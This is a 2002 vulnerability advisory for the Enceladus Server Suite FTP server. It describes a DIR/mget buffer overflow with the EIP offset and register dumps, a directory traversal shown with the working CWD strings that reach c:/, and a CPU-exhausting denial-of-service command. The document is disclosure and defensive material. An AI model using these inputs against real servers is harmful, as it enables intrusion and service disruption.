
Enceladus Server Multiple vulnerabilities



19th Dec 2002 [SBWID-5889]
COMMAND

	Multiple vulnerabilities in Enceladus Server

SYSTEMS AFFECTED

	Enceladus Server Suite (up to ??) version 3.9

PROBLEM

	Thanks to securma massine [securma@caramail.com] for the advisory:
	
	 1- Buffer overflow
	
	Tamer reported that the server crashed with a "long sequence of
	characters as an argument to the "CD" command"
	
	(http://online.securityfocus.com/archive/1/302596)
	
	I believe he missed a true buffer overflow, because this crash only
	allows an overwrite of ESP and thus a simple DoS attack:
	
	50e091e3 803820 cmp byte ptr [eax],0x20 (ftpservx.dll)
	
	With the argument "DIR" we can overwrite EIP:
	
	dir+[buffer = 279 bytes] >> EIP is overwritten at: 42,43,44,45
	
	This is sufficient for the injection of shellcode. The state of the
	registers is:
	
	Access violation - code c0000005 (first chance)
	eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5 esi=0012bce0
	edi=0019affd
	eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl zr na po nc
	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
	efl=00000246 61616161 ?? ???
	
	We then notice that EIP is at the beginning of our buffer:
	
	ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=4BYTE]
	aaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	
	The argument "mget" also gives the same result. The exploit is simple
	to realize since EBX points to our buffer:
	
	0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
	
	
	 2- Directory traversal
	
	ftp>cd ..
	access denied
	ftp>cd cd @/....\
	250 CWD command successful.
	ftp> dir
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-ftp
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
	-rwxr-xr-x 1 User Group 8544 Mar 18 02:09 emailme.html
	-rwxr-xr-x 1 User Group 878 Mar 16 04:52 execupload.html
	-rwxr-xr-x 1 User Group 1033 Oct 27 02:22 exitstatus.html
	-rwxr-xr-x 1 User Group 5965 Mar 18 02:12 fileuplogin.html
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
	-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
	-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
	-rwxr-xr-x 1 User Group 1299 Mar 18 23:41 mailexitstatus.html
	-rwxr-xr-x 1 User Group 4402 Mar 18 02:09 MyPictures.html
	drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-downloads
	-rwxr-xr-x 1 User Group 5082 Mar 18 02:09 signguestbook.html
	-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
	ftp> cd @@@@@@@@@@@/..c:\
	250 CWD command successful.
	ftp> dir
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	226 Listing complete.
	ftp> pwd
	257 "c:/" is current directory.
	ftp> dir
	
	[NO COMMENT]
	
	 3- Denial of service and CPU consumption
	
	ftp> cd @/..@/..
	(no response)
	
	cpu 99% used

SOLUTION

	see http://www.mollensoft.com/

